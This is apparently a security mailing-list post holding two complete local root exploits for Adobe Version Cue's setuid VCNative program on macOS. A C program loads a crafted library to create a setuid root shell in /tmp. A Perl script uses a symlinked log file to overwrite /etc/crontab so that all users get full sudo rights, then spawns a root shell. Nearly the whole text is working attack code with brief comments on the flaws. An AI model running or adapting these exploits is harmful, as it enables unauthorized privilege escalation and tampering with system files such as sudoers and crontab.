exploits for the vulnerabilies referenced in the iDefense advisory. ---------------------- xosx-adobe-vcnative-dyld.c ---------------------- /*[ Adobe Version Cue VCNative[OSX]: local root exploit. (dyld) ]* * * * by: vade79/v9 v9@xxxxxxxxxxx (fakehalo/realhalo) * * * * Adobe Version Cue's VCNative program allows un-privileged * * local users to load arbitrary libraries("bundles") while * * running setuid root. this is done via the "-lib" * * command-line option. * * * * note: VCNative must connect to a valid host to be able * * to get to the point where the library is loaded. this is * * automated in this exploit by listening to an arbitrary local * * port and using the localhost("") to connect to. * *****************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <signal.h> #include <unistd.h> #include <netdb.h> #include <sys/stat.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <netinet/in.h> #include <arpa/inet.h> #define VCNATIVE_PATH "/Applications/Adobe Version Cue/tomcat/webapps"\ "/ROOT/WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative" #define VCNATIVE_PORT 7979 #define CC_PATH "/usr/bin/gcc" #define BUNDLE_PATH "/tmp/xvcn_lib" #define SUSH_PATH "/tmp/xvcn_sush" void printe(char *,signed char); int main(){ signed int sock=0,so=1; char syscmd[4096+1]; struct stat mod; struct sockaddr_in sa; FILE *bundle,*sush; /* banner. */ printf("[*] Adobe Version Cue VCNative[OSX]: local root exploit. (dy" "ld)\n[*] by: vade79/v9 v9@xxxxxxxxxxx (fakehalo/realhalo)\n\n"); /* see if we have what we need. */ if(access(CC_PATH,X_OK)) printe("incorrect gcc/cc path. (CC_PATH)",1); if(stat(VCNATIVE_PATH,&mod)) printe("incorrect VCNative path. (VCNATIVE_PATH)",1); if(!(S_ISUID&mod.st_mode)) printe("VCNative is not setuid. (VCNATIVE_PATH)",1); /* appease VCNative's initial connection to load the library. */ sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so)); #ifdef SO_REUSEPORT setsockopt(sock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so)); #endif sa.sin_family=AF_INET; sa.sin_port=htons(VCNATIVE_PORT); sa.sin_addr.s_addr=INADDR_ANY; printf("[*] opening local port: %u.\n",VCNATIVE_PORT); if(bind(sock,(struct sockaddr *)&sa,sizeof(sa))==-1) printe("could not bind socket.",1); listen(sock,1); /* make the bogus library/bundle. */ if(!(bundle=fopen(BUNDLE_PATH ".c","w"))) printe("could not write to bundle source file.",1); fprintf(bundle,"void VCLibraryInit(){\n"); fprintf(bundle," seteuid(0);\n"); fprintf(bundle," setuid(0);\n"); fprintf(bundle," setegid(0);\n"); fprintf(bundle," setgid(0);\n"); fprintf(bundle," chown(\"" SUSH_PATH "\",0,0);\n"); fprintf(bundle," chmod(\"" SUSH_PATH "\",3145);\n"); fprintf(bundle,"}\n"); fprintf(bundle,"void VCLibraryExec(){}\n"); fprintf(bundle,"void VCLibraryExit(){}\n"); fclose(bundle); /* make the (to-be) rootshell. */ if(!(sush=fopen(SUSH_PATH ".c","w"))) printe("could not write to sush/rootshell source file.",1); fprintf(sush,"int main(){\n"); fprintf(sush," seteuid(0);\n"); fprintf(sush," setuid(0);\n"); fprintf(sush," setegid(0);\n"); fprintf(sush," setgid(0);\n"); fprintf(sush," execl(\"/bin/sh\",\"sh\",0);\n"); fprintf(sush,"}\n"); fclose(sush); /* compile the bogus library/bundle. */ snprintf(syscmd,4096,"%s %s.c -bundle -o %s.bundle",CC_PATH, BUNDLE_PATH,BUNDLE_PATH); printf("[*] system: %s\n",syscmd); system(syscmd); /* compile the (to-be) rootshell. */ snprintf(syscmd,4096,"%s %s.c -o %s",CC_PATH, SUSH_PATH,SUSH_PATH); printf("[*] system: %s\n",syscmd); system(syscmd); /* run VCNative. (".bundle" is appended to the library path) */ snprintf(syscmd,4096,"\"%s\" -host -port %u -lib %s", VCNATIVE_PATH,VCNATIVE_PORT,BUNDLE_PATH); printf("[*] system: %s\n",syscmd); system(syscmd); /* clean-up. */ unlink(BUNDLE_PATH ".c"); unlink(BUNDLE_PATH ".bundle"); unlink(SUSH_PATH ".c"); shutdown(sock,2); close(sock); /* check for success. */ if(stat(SUSH_PATH,&mod)) printe("sush/rootshell vanished? (SUSH_PATH)",1); if(!(S_ISUID&mod.st_mode)||mod.st_uid){ unlink(SUSH_PATH); printe("sush/rootshell is not setuid root, exploit failed.",1); } /* success. */ printf("[*] attempting to execute rootshell... (" SUSH_PATH ")\n\n"); system(SUSH_PATH); exit(0); } /* all-purpose error/exit function. */ void printe(char *err,signed char e){ printf("[!] %s\n",err); if(e)exit(e); return; } ------------------------ xosx-adobe-vcnative.pl ------------------------ #!/usr/bin/perl # # Adobe Version Cue VCNative[OSX]: local root exploit. # # by: vade79/v9 v9@xxxxxxxxxxx (fakehalo/realhalo) # # Adobe Version Cue's VCNative program writes data to a log file in # the current working directory while running as (setuid) root. the # logfile is formated as <cwd>/VCNative-<pid>.log, which is easily # predictable. you may link this file to any file on the system # and overwrite its contents. use of the "-host" option (with # "-port") will allow user-supplied data to be injected into the # file. # # This exploit works by overwriting /etc/crontab with # '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and # log garbage. within a short period of time crontab will overwrite # /etc/sudoers and "sudo sh" to root is possible. this method is used # because direct overwriting of /etc/sudoers will cause sudo to exit # with configuration errors due to the log garbage, whereas crontab # will ignore it. (this exploit requires both cron to be running and # sudo to exist--this is generally default osx) use POSIX; $vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" . "WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative"; $vcn_pid=($$ + 1); $vcn_cwd="/tmp"; $vcn_tempfile="$vcn_cwd/VCNative-$vcn_pid\.log"; $ovrfile="/etc/crontab"; $ovrstr="* * * * * root echo \\\"ALL ALL=(ALL) ALL\\\">/etc/sudoers"; sub pexit{print("[!] @_.\n");exit(1);} print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n"); print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n"); if(!-f $vcn_path){ pexit("VCNative binary doesn't appear to exist"); } if(!-f"/etc/crontab"||!-f"/etc/sudoers"){ pexit("/etc/crontab and /etc/sudoers are required for this to work"); } print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n"); symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files."); @ast=stat($ovrfile); print("[*] running VCNative...\n"); system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\""); print("[*] removing $vcn_tempfile...\n"); unlink($vcn_tempfile); @st=stat($ovrfile); if($st[7]==$ast[7]&&$st[9]==$ast[9]){ pexit("$ovrfile was not modified, exploit failed"); } else{ print("[*] $ovrfile was overwritten successfully...\n"); } print("[*] waiting for crontab to change /etc/sudoers...\n"); @ast=@st=stat("/etc/sudoers"); while($st[7]==$ast[7]&&$st[9]==$ast[9]){ sleep(1); @ast=stat("/etc/sudoers"); } print("[*] /etc/sudoers has been modified.\n"); print("[*] attempting to \"sudo sh\". (use YOUR password)\n"); system("sudo sh"); exit(0);